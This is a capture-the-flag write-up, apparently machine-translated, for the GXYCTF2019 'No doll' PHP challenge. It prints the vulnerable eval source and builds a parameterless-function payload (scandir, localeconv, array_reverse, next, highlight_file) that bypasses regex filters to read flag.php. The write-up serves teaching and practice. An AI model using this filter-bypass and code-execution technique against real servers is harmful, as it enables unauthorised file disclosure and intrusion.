buuctf-[GXYCTF2019] No doll （ Xiaoyute detailed explanation ）

Let's look at the question first

There is no useful information found here , First use dirsearch To blow up but didn't find anything useful , At this time, I suspect there is git Leaked the use here githack Detection found index.php

Look at the source code here

<?php
 2 include "flag.php";
 3 echo "flag Where is it ？<br>";
 4 if(isset($_GET['exp'])){
    // Need to be GET The form passes in a name exp Parameters of . If the conditions are met, this... Will be executed exp Parameter content .
 5     if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
    // Several common pseudo protocols are filtered , Cannot read file with pseudo Protocol .
 6         if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
    
     //(?R) Reference the current expression , I added ? Recursively call . You can only match through parameterless functions .
 7             if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
    // Regular matches are missing et/na/info Other key words , Many functions don't work .
 8                 // echo $_GET['exp'];
 9                 @eval($_GET['exp']);
10             }
11             else{
    
12                 die(" It's a little bit close to ！");
13             }
14         }
15         else{
    
16             die(" Think about it ！");
17         }
18     }
19     else{
    
20         die(" Still want to read flag, Smelly brother ！");
21     }
22 }
23 // highlight_file(__FILE__);
24 ?>

The key point is

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

there ?R It means

Reference the current expression , Add... To the back ？ It's a recursive call

therefore exp Must be a(b()); This type is OK

We learned from the source code flag stay flag.php in

Just find a way to read

scandir() Function can scan files in the current directory

<?php
print_r(scandir('.'));
?>

structure scandir(’.’) Can

It's used here 2 A function

localeconv() Function returns an array of local numbers and currency format information . And the first item in the array is .
current() Returns the current cell in the array , The first value is taken by default .

Note here

current(localeconv()) Always a point

First step

?exp=print_r(scandir(current(localeconv())));

Here you need to read the penultimate array

Two functions are also used here

next()： The function points the internal pointer to the next element in the array , And the output

array_reverse()： Array returns the array in the reverse order of elements

final payload

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));